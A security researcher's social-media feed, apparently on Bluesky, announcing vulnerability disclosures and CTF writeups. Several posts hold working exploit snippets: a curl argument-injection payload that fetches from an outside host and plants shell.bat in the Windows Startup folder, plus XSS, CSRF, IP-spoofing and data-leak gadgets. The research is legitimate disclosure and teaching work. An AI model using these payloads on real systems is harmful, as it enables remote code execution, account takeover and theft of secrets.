Sign in

Jorian

@jorianwoltjer.com
351 followers 107 following 107 posts

Normalize being weird.

PostsRepliesMedia
Jorian @jorianwoltjer.com · 29/09/2026
We just released the first episode of our new video series: Proof of Concept! Where we explain the vulnerabilities we find at Aikido with visuals and an interview-style. This episode is about the Gogs RCE vulnerability affecting default configuration: youtu.be/QIgr61KhcDo
youtu.be
RCE from a nested repo trick in Gogs!
YouTube video by Aikido Security
020
Jorian @jorianwoltjer.com · 24/09/2026
It finally happened!! Check out the latest @ctbbpodcast.bsky.social episode packed with client-side fun: www.youtube.com/watch?v=eV81...
youtube.com
Browser Logic Errors & XS-Leaks with Jorian Woltjer (Ep. 193)
YouTube video by Critical Thinking - Bug Bounty Podcast
010
Jorian @jorianwoltjer.com · 30/08/2026
🇳🇱 Voor de Nederlanders, ik help mee met het organiseren en challenges bouwen bij de National Hackers Cup 2026! Kom 19 september naar Purmerend, we hebben plek voor 500 deelnemers. Zoek een team van 4 of ga solo, en meld je aan: nhc.sh/aanmelden
nhc.sh
National Hackers Cup 2026 | Het NK Hacken | 19 september, Purmerend
De grootste CTF in de geschiedenis van Nederland. Zaterdag 19 september 2026 in het H20 Esports Campus in Purmerend. 500 plekken, gratis, en de winnaar gaat naar huis als beste hacker van het land.
000
Jorian @jorianwoltjer.com · 20/08/2026
There's never enough Unauthenticated RCE's. Here I took a limited AI finding and through some clever Git structures, escalate it to Remote Code Execution on the default installation of Gogs 0.14.2! Read this and more in our latest blog post: www.aikido.dev/blog/fixed-r...
aikido.dev
Yet another RCE in Gogs, but it's fixed this time!
CVE-2026-52813 | An Aikido pentesting agent flagged a path traversal in Gogs. We escalated it to full RCE and reported two more bugs, all fixed in 0.14.3.
010
Reposted by Jorian
Cezar Lungu @cezarlungu.com · 17/08/2026
shaderghost.gg
shaderghost.gg
ShaderGhost — the tracking ID you can't delete
Clear your cookies. It's still watching. See a tracking ID hidden in your graphics card, live in your browser.
021
Jorian @jorianwoltjer.com · 09/08/2026
What started with a simple question on Discord, ended in *reviving an old XS-Leak technique* for probing status codes in background requests! Unravel the mystery with me in the latest @ctbbpodcast.bsky.social blog post: lab.ctbb.show/research/sol...
https://lab.ctbb.show/research/solving-an-orb-mystery
022
Jorian @jorianwoltjer.com · 06/08/2026
It's aliiiiive!
000
Jorian @jorianwoltjer.com · 03/08/2026
Playing L3akCTF this weekend with my teammates in Superflat was a blast! The challenge that stood out to me was "Squid", showcasing a werkzeug Race Condition with file descriptor symlinks that I'm sure can be applied elsewhere. Check out the writeup below: jorianwoltjer.com/blog/p/ctf/l...
jorianwoltjer.com
L3akCTF 2026 - Squid | Jorian Woltjer
A complex server-side web challenge showing off some parser differentials and a new technique. It was followed by a really interesting race condition technique involving file descriptors to read envir...
010
Jorian @jorianwoltjer.com · 22/07/2026
We took a look at popular open-source forum platform NodeBB! This resulted in interesting vulnerabilities involving the ActivityPub protocol My favorite is *translation templates* causing XSS everywhere, requiring a large rewrite of the codebase in v4.14.0 www.aikido.dev/blog/eight-h...
aikido.dev
Finding eight high-severity vulnerabilities in NodeBB in six hours
Eight high-severity NodeBB vulnerabilities, found by our AI Pentest in six hours. Full technical breakdown of the XSS chains, auth bypasses, and post hijacking.
012
Jorian @jorianwoltjer.com · 07/07/2026
Simple IDOR turned into an interesting question of "how do we find the IDs?" The answer: Continuously probe ObjectId()'s from MongoDB and search through the predictable gaps! Check out the full explanation & implementation below: www.aikido.dev/blog/predict...
aikido.dev
Predicting MongoDB ObjectId() continuously in Rocket.Chat
Aikido's AI pentester found this file-access flaw in Rocket.Chat. A closer look at MongoDB's ObjectId() showed the weak randomness that makes it exploitable.
021
Jorian @jorianwoltjer.com · 03/07/2026
It's friday so you know what that means, time for a critical vulnerability! Okay... we announced it 4 weeks ago already to be fair, but now we can talk about the technical parts 🙌 Read how authentication could be bypassed on every online phpBB instance: www.aikido.dev/blog/authent...
aikido.dev
Authentication Bypass in the default configuration phpBB
Our AI pentest agents found a critical phpBB auth bypass (CVE-2026-48611): one unauthenticated request logs you into any account. See the exploit and the fix.
111
Jorian @jorianwoltjer.com · 03/07/2026
This new HTML feature just shipped in Chrome 150, it's gonna be veeeeery interesting 👀 github.com/WICG/declara...
https://yeswehack.github.io/Dom-Explorer/shared?id=860dd7e8-6ae1-41c6-9f06-68beb03e101c
121
Jorian @jorianwoltjer.com · 02/06/2026
Now that everybody's had a chance to solve it, here's a timelapse of my playtesting run of the JavaScript Crossword! SPOILER WARNING: Please try it yourself first in the post below, it's very satisfying to solve, I don't want you to miss out on that 😄 (1 second = 2 minutes)
052
Jorian @jorianwoltjer.com · 28/05/2026
I won't keep you in mystery any longer, here's how I found an XSS vulnerability *in* Shazzer! The chain involved some interesting browser techniques no sane developer could foresee. Check out the details below: jorianwoltjer.com/blog/p/stori... (and thanks @garethheyes.co.uk for making Shazzer!)
jorianwoltjer.com
Finding XSS on Shazzer (literally) | Jorian Woltjer
How I found an XSS in Shazzer, a tool for discovering and sharing browser quirks through fuzzing. Not *using*, but *in* Shazzer. We'll explore some useful techniques with Blob URLs to unsandbox malici...
096
Reposted by Jorian
Rebane @rebane2001.bsky.social · 25/05/2026
i made a new game called js crossword where you have to solve it by literally writing javascript code that eval()'s into the correct values! check it out if you're into ctfs or wanna challenge your javascript skills lyra.horse/fun/jscrossw... <3
JS Crossword
a crossword where the clue = eval(answer)

Welcome to JS Crossword! Every clue is a JS eval of its answer - for example, 7 could be solved with 3+4 and [object Object] could be solved with []+{}. This crossword uses some lesser-known and cursed JS features, so I'd recommend it for people already somewhat familiar with JavaScript.

You're allowed to use the following characters: A-Za-z0-9!"()*+-./<=>[]`{}. This means that no spaces (empty squares), commas, or semicolons are allowed to be used. The crossword is case-sensitive. The final answer consists only of english words, so it must match A-Za-z.

Your answers will be evaluated within an eval() sandbox, you can try it out at the playground below. You're of course also allowed to use other resources, such as DevTools, MDN, searching etc. This crossword is human-made, so if you solve it with AI you're lame, learn to have fun.

You can change the writing direction by clicking a square or pressing ctrl. Your progress is savedbanner image - JS Crossword, a crossword where the clue = eval(answer)

a mini-crossword is pictured underneath as a visual examplegameplay screenshot showing the crossword partially filled in

the status at the bottom can be seen saying:
across (green)
expect: cw==
actual: cw==
down (red)
expect: -Infinity
error: SyntaxError: Unexpected end of input
2322358
Jorian @jorianwoltjer.com · 08/05/2026
Thanks @cryptocat.me for inviting me to my first ever podcast! Check out the section at 29:36 😄
030
Jorian @jorianwoltjer.com · 03/05/2026
Happy to have made some web chllaenges for Plfanzen CTF. The evetn runs next weekend, cehck it out! plfanzen.lol
plfanzen.lol
plfanzen
011
Jorian @jorianwoltjer.com · 23/04/2026
(2/2) After some wild ideas of leaking it, I found a different solution using the obscure "Variables" (curl.se/docs/manpage...) feature of curl. We can define and expand {{USERPROFILE}}, then finish with an 8.3 Shortname "StartM~1" to avoid issues with a space! The final payload:
fetch("/copyme", {
  "body": "\x7f\" --next --variable %USERPROFILE --expand-output {{USERPROFILE}}/AppData/Roaming/Microsoft/Windows/StartM~1/Programs/Startup/shell.bat --url http://r.jtw.sh/?b=calc.exe -v \"",
  "method": "POST",
});
060
Jorian @jorianwoltjer.com · 23/04/2026
Cool exploit with @0x999.net: He found that \x7F breaks Chrome's "Copy as cURL (cmd)" command parsing in Windows Console Host. In combination with a ", it allowed you to add any arguments to curl. With -o writing files is easy, but we need the username for the startup path... (1/2)
Windows shell:startup folder wrote shell.bat from conhost.exe opening calculator. Username in path highlighted
161
Jorian @jorianwoltjer.com · 21/04/2026
We tested another mail client, Roundcube this time. The agents found a Stored Self-XSS vulnerability that could really only be exploited with Cookie Tossing. Scary for password reset tokens... Blog post below: www.aikido.dev/blog/roundcu...
aikido.dev
Roundcube XSS chained with cookie tossing for full inbox access
We found a stored XSS in Roundcube's draft attachment endpoint that, chained with a cookie tossing technique, gives an attacker full access to a victim's inbox. Here's how the exploit chain works and ...
041
Jorian @jorianwoltjer.com · 17/04/2026
New blog post is out! A few vulnerabilities in Mailcow. A critical unauthenticated XSS, and another interesting Self-XSS escalation involving a Login CSRF with a leftover tab. Check it out: www.aikido.dev/blog/xss-vul...
aikido.dev
Multiple XSS Vulnerabilities Found in Mailcow, Including Unauthenticated Account Takeover
Aikido's AI pentest agent found three XSS vulnerabilities in Mailcow, one of which let unauthenticated attackers take over administrator accounts. All issues have been patched as of version 2026-03b.
011
Jorian @jorianwoltjer.com · 17/03/2026
Fun parser differential to fallback SVG sanitizer bypass: github.com/freescout-he...
github.com
Stored XSS through SVG file upload with filter bypass
### Summary Bypasses of the attachment view logic and SVG sanitizer make it possible to upload and render an SVG that runs malicious JavaScript. An extension of `.png` with content type of `imag...
032
Jorian @jorianwoltjer.com · 04/03/2026
WebSockets are not yet affected by Local Network Access permission in Chrome. Check out this blog post from my colleague Robbe! www.aikido.dev/blog/storybo...
aikido.dev
How Storybook's WebSocket Server Became a Supply Chain Attack Vector: CVE-2026-27148
CVE-2026-27148 exposes a WebSocket hijacking flaw in Storybook that can escalate into supply chain compromise. Learn the attack path, impact, and how to remediate.
040
Jorian @jorianwoltjer.com · 02/03/2026
XSS on a password manager, about the scariest impact you can have... github.com/aliasvault/a... Luckily it was fixed super quick! Here's a simple script you can use to send raw HTML in emails. I think a lot more clients will benifit from sanitizer testing. gist.github.com/JorianWoltje...
github.com
Cross-Site Scripting (XSS) via Email HTML Rendering
## Impact A stored cross-site scripting (XSS) vulnerability was identified in the email rendering feature of AliasVault Web Client versions 0.25.3 and lower. When viewing received emails on an ali...
011
Reposted by Jorian
aikido | no bullsh*t security for devs @aikidosecurity.bsky.social · 26/02/2026
Software can now secure itself. → www.aikido.dev/attack/infin...
131
Jorian @jorianwoltjer.com · 23/02/2026
Just a few days later, there's the next blog post for @aikidosecurity.bsky.social! Another framework-level vulnerability this time affecting Astro, resulting in SSRF if an unvalidated connection can be made to the webserver. Read the details here: www.aikido.dev/blog/astro-f...
aikido.dev
Astro SSRF Vulnerability: Host Header Injection in SSR Error Pages (CVE-2026-25545)
Aikido Security's AI pentesting agent discovered a Server-Side Request Forgery vulnerability in Astro's SSR implementation. Learn how Host header injection in prerendered error pages allowed full inte...
010
Jorian @jorianwoltjer.com · 19/02/2026
My first disclosed vulnerability since joining @aikidosecurity.bsky.social, and it's a banger! SvelteKit + Vercel = Cache Deception. This shows how AI agents can find framework-level vulnerabilities, and that caching will continue to cause headaches. Enjoy :) www.aikido.dev/blog/sveltes...
aikido.dev
SvelteSpill: Critical Cache Deception Bug in SvelteKit + Vercel
SvelteSpill is a cache deception vulnerability affecting default SvelteKit apps deployed on Vercel. Authenticated responses can be cached and exposed across users. Learn how to check if you’re vulnera...
171
Jorian @jorianwoltjer.com · 01/02/2026
Had a fun XSS gadget chain with antoniusblock on a real world target, he made an awesome writeup: blog.antoniusblock.net/posts/dom-cl...
blog.antoniusblock.net
A CTF-Style XSS Chain in the Wild: DOM Clobbering, Gadgets, and CSP Bypass
A bug bounty target that unexpectedly felt like a CTF. What began as simple recon turned into a nice chain of discoveries that ultimately led to a valid XSS
092
Jorian @jorianwoltjer.com · 15/01/2026
Every year I look through this list with amazement for what all the people came up with. This year I suddenly saw my own article nominated, not 1 but 2! 🤩 1. "Nonce CSP bypass using Disk Cache" on my blog 2 "Stopping Redirects" with @ctbbpodcast.bsky.social Go vote! portswigger.net/polls/top-10...
portswigger.net
Top 10 web hacking techniques of 2025
Welcome to the community vote for the Top 10 Web Hacking Techniques of 2025.
030
Jorian @jorianwoltjer.com · 05/01/2026
I made a shorter writeup for the CatGPT challenge during hxp CTF at 39C3! It featured a cool combination of JavaScript injections to escape our context and fix the remaining syntax. Check it out: jorianwoltjer.com/blog/p/ctf/h...
jorianwoltjer.com
hxpCTF 2025 - CatGPT | Jorian Woltjer
The hardest web challenge during 39C3's hxp CTF. Auditing RegExes in a PHP library to uncover small gadgets that allow escaping and fixing a JavaScript context.
051
Jorian @jorianwoltjer.com · 27/12/2025
Just arrived at #39c3, shoot me a DM if you wanna meet! 😄
011
Jorian @jorianwoltjer.com · 23/12/2025
Here is my writeup of Intigriti's December XSS challenge. It consisted of 6 smaller challenges combining into a big 1-click exploit. One of the most fun ones I've ever played. Loved the unique format by @renwax23.bsky.social! jorianwoltjer.com/blog/p/ctf/i...
jorianwoltjer.com
Intigriti December XSS Challenge (1225) | Jorian Woltjer
A unique 6-part challenge by @Renwa containing many interesting techniques that combine into one large exploit. Learn some HTML/JavaScript quirks, an XS-Leak and how to minimize user interaction
031
Jorian @jorianwoltjer.com · 09/12/2025
There's a new post on the Critical Research Lab! I've seen a lot of questions and fun tricks related to this subject recently so I hope this helps answer some of them. Enjoy! lab.ctbb.show/research/sto...
lab.ctbb.show
Stopping Redirects
Interesting ways to stop redirects of another site in the browser for use in OAuth and exploits requiring interaction
010
Reposted by Jorian
Rebane @rebane2001.bsky.social · 04/12/2025
my new blogpost is out!! this one talks about a new web vulnerability class i discovered that allows for complex interactive cross-origin attacks and data exfiltration and i've already used it to get a google docs bounty ^^ have fun <3 lyra.horse/blog/2025/12...
lyra.horse
SVG Filters - Clickjacking 2.0
A novel and powerful twist on an old classic.
818150
Jorian @jorianwoltjer.com · 16/11/2025
The author of the challenge, dari1wastaken, got the idea from this paper. Great results on internet-exposed servers: www.ndss-symposium.org/ndss-paper/a...
ndss-symposium.org
A Large-Scale Measurement Study of the PROXY Protocol and its Security Implications - NDSS Symposium
000
Jorian @jorianwoltjer.com · 16/11/2025
Really interesting technique from a local CTF. In gunicorn with --proxy-protocol --proxy-allow-from='*', the "Proxy Protocol" (github.com/haproxy/hapr...) allows you to spoof the source IP with a PROXY prefix like this! I feel like it might be useful as impact in Request Tunneling👀
PROXY TCP4 127.0.0.1 1.2.3.4 1337 80
GET /ip HTTP/1.1
Host: 1.2.3.4:80

------------------------------------
HTTP/1.1 200 OK
Server: gunicorn

Your IP: 127.0.0.1
130
Jorian @jorianwoltjer.com · 17/10/2025
(5/5) For Client-Side Race Conditions based on network requests, you can slow down time by holding up the Connection Pool. Then slowly release them one by one, performing any actions you need in between with 100% consistency.
async function release_once() {
  blocker.abort();
  await sleep(0);
  blocker = fetch_long(1337);
}
011
Jorian @jorianwoltjer.com · 17/10/2025
(4/5) Form input history is restored on history.back() even if the HTML changed in the meantime. For inputs without a form, that means you can hijack it into your own form with a form= attribute as an exception. From there you could submit your form to leak it.
<input type="text" name="flag">
----------- AFTER -------------
<form action="/attacker" id="x">
  <input type="text" name="flag" form="x">
  <input type="submit" form="x">
</form>
100
Jorian @jorianwoltjer.com · 17/10/2025
(3/5) Script gadgets inside an <iframe srcdoc> that require URL parameters can be set using a <meta http-equiv="refresh"> redirect to about:srcdoc. It reloads the document with the new URL while keeping its content.
<iframe srcdoc='
  <meta http-equiv="refresh" content="1;url=about:srcdoc?param=value">
  <script src="/gadget.js"></script>
'></iframe>
100
Jorian @jorianwoltjer.com · 17/10/2025
(2/5) With a strict CSP, .click() gadgets can be very useful for things like: * Opening the attacker's website with <a target="_blank"> * Submitting a form for CSRF * Performing actions on the site to trigger other behavior
<form action="/change_password" method="POST">
  <input type="text" name="new_password" value="hacked">
  <!-- Submit button is clicked by script gadget -->
  <input type="submit" id="something">
</form>
<script src="/click-something.js"></script>
100
Jorian @jorianwoltjer.com · 17/10/2025
For the people who don't have time to read this entire thing, here are the coolest tricks I mentioned 😄: (1/5)
131
Jorian @jorianwoltjer.com · 13/10/2025
Follow your rabbit holes is the takeaway from my latest CTF writeup. I found several interesting techniques that can help tricky situations, such as using the Connection Pool to make Client-Side Race Conditions easier! Read the whole thing on my blog: jorianwoltjer.com/blog/p/ctf/o...
jorianwoltjer.com
openECSC 2025 - kittychat-secure | Jorian Woltjer
Overcomplicating a hard client-side web challenge involving complex CSP script gadgets. Exploit Math.random() predictability, and learn how to use the Connection Pool to make Race Conditions easier.
032
Jorian @jorianwoltjer.com · 08/10/2025
I posted 2 more small articles to the Critical Thinking Research Lab: * Nonce CSS leak in MathML: lab.ctbb.show/research/lea... * HTML fun facts: lab.ctbb.show/research/htm...
lab.ctbb.show
Leaking CSP nonces with CSS & MathML
By dangling a tag in HTML, leaking nonce attributes via CSS is possible again!
051
Jorian @jorianwoltjer.com · 19/09/2025
My first post for the @ctbbpodcast.bsky.social Research Lab is live. Super excited to be part of this team, can't wait to see what crazy research is gonna come from this! lab.ctbb.show/research/Exp...
lab.ctbb.show
Exploiting Web Worker XSS with Blobs
Ways to turn XSS in a Web Worker into full XSS, covering known tricks and a new generic exploit using Blob URLs with the Drag and Drop API
093
Jorian @jorianwoltjer.com · 18/09/2025
AMAZING technique by @salvatoreabello, I've been inspired by the connection pool exploits he comes up with. Check out this crazy impact labeled as "working as intended": blog.babelo.xyz/posts/cross-...
063
Jorian @jorianwoltjer.com · 16/09/2025
Forgot to add what we leak, this is the result:
010
Jorian @jorianwoltjer.com · 16/09/2025
On our attacker's page, we load this in an iframe and can then access [0] to get a reference to our injected object. To read its name, we can set its location to *our* about:blank and then read the .name window property (set by the attribute)!
<iframe id="iframe" src="https://target.tld/dangling-object"></iframe>
<script>
  iframe.onload = () => {
    const object = iframe.contentWindow[0];
    object.location = "about:blank";  // Navigate to our same-origin
    const interval = setInterval(() => {
      object.origin;  // When it becomes same-origin
      clearInterval(interval);
      alert(object.name);  // Leak its name (kept after navigation)
    })
  }
</script>
210
Jorian @jorianwoltjer.com · 16/09/2025
While playing a challenge by Salvatore Abello, I found a pretty interesting way to exploit Dangling Markup with a strict CSP. All you need is an <iframe>, <object> or <embed> set to about:blank, with a dangling name= attribute. This vulnerable page should be iframable.
Content-Security-Policy: default-src 'none'

<object data="about:blank" name='
<form>
  <input type="hidden" name="csrf" value="SECRET">
</form>
<script>
  console.log('Hello, world!');
</script>
210
Jorian @jorianwoltjer.com · 13/09/2025
Final exploit code: gist.github.com/JorianWoltje... Thanks Omid sharing this challenge!
onclick = () => {
    window.open(location.href);
    location = "http://127.0.0.1:8000/vuln.html";
}
setTimeout(() => {
    const iframe = document.createElement("iframe");
    iframe.srcdoc = "";
    document.body.appendChild(iframe);
    iframe.onload = () => {
        iframe.contentWindow.eval('top.opener.postMessage("alert(origin)", "*")');
        iframe.remove();
    }
}, 1000);
010
Jorian @jorianwoltjer.com · 13/09/2025
We first duplicate our page, then navigate the first tab to the target. From our 2nd tab, the iframe can now access `top.opener` to send a message to the target. Quickly after, the parent removes the iframe and the `event.source` becomes `null`.
Target tab on the left, and attacker tab on the right with an iframe inside. Arrow pointing from iframe up to parent with `.top`, and then to the left target window with `.opener`
100